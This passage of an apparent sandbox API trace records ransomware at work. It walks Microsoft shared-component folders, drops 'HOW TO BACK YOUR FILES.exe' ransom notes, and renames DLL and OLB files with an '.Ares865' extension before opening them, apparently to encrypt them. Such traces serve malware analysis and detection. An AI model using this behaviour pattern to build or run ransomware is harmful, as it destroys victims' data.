(HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0148.698] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0148.698] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f02f8 [0148.785] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC" [0148.785] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0148.785] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b48 | out: hHeap=0x2b0000) returned 1 [0148.785] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC") returned 55 [0148.785] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC" [0148.785] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0148.785] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vc\\how to back your files.exe"), bFailIfExists=1) returned 0 [0148.787] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0148.789] GetLastError () returned 0x0 [0148.790] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0148.790] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0148.791] CloseHandle (hObject=0x120) returned 1 [0148.791] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0148.791] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0148.791] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8f61b1a0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x5363c5c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5363c5c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0148.792] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0148.792] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0148.792] lstrcpyW (in: lpString1=0x2cce470, lpString2="amd64" | out: lpString1="amd64") returned="amd64" [0148.792] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b48 [0148.792] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7c) returned 0x2f02f8 [0148.792] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b50 | out: ListHead=0x2e7710, ListEntry=0x2e7b50) returned 0x2e7b10 [0148.792] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5363c5c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x5363c5c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0148.792] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0148.792] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5cdca800, ftCreationTime.dwHighDateTime=0x1cbd035, ftLastAccessTime.dwLowDateTime=0xcc438260, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0x5cdca800, ftLastWriteTime.dwHighDateTime=0x1cbd035, nFileSizeHigh=0x0, nFileSizeLow=0xc3350, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="msdia100.dll", cAlternateFileName="")) returned 1 [0148.792] lstrcmpiW (lpString1="msdia100.dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0148.792] lstrcmpiW (lpString1="msdia100.dll", lpString2="aoldtz.exe") returned 1 [0148.793] lstrcpyW (in: lpString1=0x2cce470, lpString2="msdia100.dll" | out: lpString1="msdia100.dll") returned="msdia100.dll" [0148.793] lstrlenW (lpString="msdia100.dll") returned 12 [0148.793] lstrlenW (lpString="Ares865") returned 7 [0148.793] lstrcmpiW (lpString1="100.dll", lpString2="Ares865") returned -1 [0148.793] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\msdia100.dll.Ares865") returned 76 [0148.793] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\msdia100.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vc\\msdia100.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\msdia100.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vc\\msdia100.dll.ares865"), dwFlags=0x1) returned 1 [0148.802] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\msdia100.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vc\\msdia100.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0148.802] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=799568) returned 1 [0148.803] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0148.803] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0148.803] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0160 [0148.875] lstrcpyW (in: lpString1=0x2cce470, lpString2="msdia80.dll" | out: lpString1="msdia80.dll") returned="msdia80.dll" [0148.875] lstrlenW (lpString="msdia80.dll") returned 11 [0148.875] lstrlenW (lpString="Ares865") returned 7 [0148.875] lstrcmpiW (lpString1="a80.dll", lpString2="Ares865") returned -1 [0148.876] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\msdia80.dll.Ares865") returned 75 [0148.876] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\msdia80.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vc\\msdia80.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\msdia80.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vc\\msdia80.dll.ares865"), dwFlags=0x1) returned 1 [0148.879] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\msdia80.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vc\\msdia80.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0148.879] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=641536) returned 1 [0148.879] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0148.879] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0148.879] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0160 [0148.915] lstrcpyW (in: lpString1=0x2cce470, lpString2="msdia90.dll" | out: lpString1="msdia90.dll") returned="msdia90.dll" [0148.915] lstrlenW (lpString="msdia90.dll") returned 11 [0148.915] lstrlenW (lpString="Ares865") returned 7 [0148.915] lstrcmpiW (lpString1="a90.dll", lpString2="Ares865") returned -1 [0148.916] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\msdia90.dll.Ares865") returned 75 [0148.916] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\msdia90.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vc\\msdia90.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\msdia90.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vc\\msdia90.dll.ares865"), dwFlags=0x1) returned 1 [0148.918] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\msdia90.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vc\\msdia90.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0148.918] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=670032) returned 1 [0148.918] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0148.918] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0148.918] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0160 [0148.952] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\amd64", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\amd64") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\amd64" [0148.952] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f02f8 | out: hHeap=0x2b0000) returned 1 [0148.952] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b48 | out: hHeap=0x2b0000) returned 1 [0148.952] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\amd64") returned 61 [0148.952] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\amd64" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\amd64") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\amd64" [0148.953] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0148.953] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\amd64\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vc\\amd64\\how to back your files.exe"), bFailIfExists=1) returned 0 [0148.954] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0148.954] GetLastError () returned 0x0 [0148.954] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0148.954] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0148.954] CloseHandle (hObject=0x120) returned 1 [0148.954] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0148.954] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0148.955] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\amd64\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa3e46d20, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x5363c5c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5363c5c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0148.955] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0148.955] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0148.955] lstrcpyW (in: lpString1=0x2cce47c, lpString2="msdia80.dll" | out: lpString1="msdia80.dll") returned="msdia80.dll" [0148.955] lstrlenW (lpString="msdia80.dll") returned 11 [0148.955] lstrlenW (lpString="Ares865") returned 7 [0148.955] lstrcmpiW (lpString1="a80.dll", lpString2="Ares865") returned -1 [0148.955] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\amd64\\msdia80.dll.Ares865") returned 81 [0148.955] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\amd64\\msdia80.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vc\\amd64\\msdia80.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\amd64\\msdia80.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vc\\amd64\\msdia80.dll.ares865"), dwFlags=0x1) returned 1 [0148.959] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\amd64\\msdia80.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vc\\amd64\\msdia80.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0148.959] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=914944) returned 1 [0148.959] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0148.959] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0148.959] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f02f8 [0149.014] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA" [0149.014] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1988 | out: hHeap=0x2b0000) returned 1 [0149.014] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b08 | out: hHeap=0x2b0000) returned 1 [0149.014] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA") returned 56 [0149.014] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA" [0149.014] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0149.014] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vba\\how to back your files.exe"), bFailIfExists=1) returned 0 [0149.016] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0149.016] GetLastError () returned 0x0 [0149.017] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0149.017] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0149.017] CloseHandle (hObject=0x120) returned 1 [0149.017] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0149.017] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0149.017] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec355540, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x53662720, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53662720, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0149.017] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0149.017] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0149.017] lstrcpyW (in: lpString1=0x2cce472, lpString2="VBA6" | out: lpString1="VBA6") returned="VBA6" [0149.017] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b08 [0149.017] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7c) returned 0x2f02f8 [0149.017] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b10 | out: ListHead=0x2e7710, ListEntry=0x2e7b10) returned 0x2e7af0 [0149.018] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec355540, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x53662720, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53662720, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VBA6", cAlternateFileName="")) returned 0 [0149.018] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0149.018] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b10 [0149.018] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\VBA6", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\VBA6") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\VBA6" [0149.018] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f02f8 | out: hHeap=0x2b0000) returned 1 [0149.018] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b08 | out: hHeap=0x2b0000) returned 1 [0149.018] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\VBA6") returned 61 [0149.018] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\VBA6" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\VBA6") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\VBA6" [0149.018] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0149.018] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\VBA6\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vba\\vba6\\how to back your files.exe"), bFailIfExists=1) returned 0 [0149.019] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0149.019] GetLastError () returned 0x0 [0149.019] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0149.019] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0149.019] CloseHandle (hObject=0x120) returned 1 [0149.019] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0149.019] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0149.019] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\VBA6\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec355540, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x53662720, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53662720, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0149.020] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0149.020] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0149.020] lstrcpyW (in: lpString1=0x2cce47c, lpString2="VBE6EXT.OLB" | out: lpString1="VBE6EXT.OLB") returned="VBE6EXT.OLB" [0149.020] lstrlenW (lpString="VBE6EXT.OLB") returned 11 [0149.020] lstrlenW (lpString="Ares865") returned 7 [0149.020] lstrcmpiW (lpString1="EXT.OLB", lpString2="Ares865") returned 1 [0149.020] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\VBA6\\VBE6EXT.OLB.Ares865") returned 81 [0149.020] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\VBA6\\VBE6EXT.OLB" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vba\\vba6\\vbe6ext.olb"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\VBA6\\VBE6EXT.OLB.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vba\\vba6\\vbe6ext.olb.ares865"), dwFlags=0x1) returned 1 [0149.025] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\VBA6\\VBE6EXT.OLB.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vba\\vba6\\vbe6ext.olb.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0149.025] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=40960) returned 1 [0149.025] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0149.026] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0149.026] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f02f8 [0149.032] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Triedit", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Triedit") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Triedit" [0149.032] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0270 | out: hHeap=0x2b0000) returned 1 [0149.032] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ae8 | out: hHeap=0x2b0000) returned 1 [0149.032] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Triedit") returned 60 [0149.032] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Triedit" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Triedit") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Triedit" [0149.032] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0149.032] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Triedit\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\triedit\\how to back your files.exe"), bFailIfExists=1) returned 0 [0149.033] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0149.033] GetLastError () returned 0x0 [0149.033] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0149.033] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0149.033] CloseHandle (hObject=0x120) returned 1 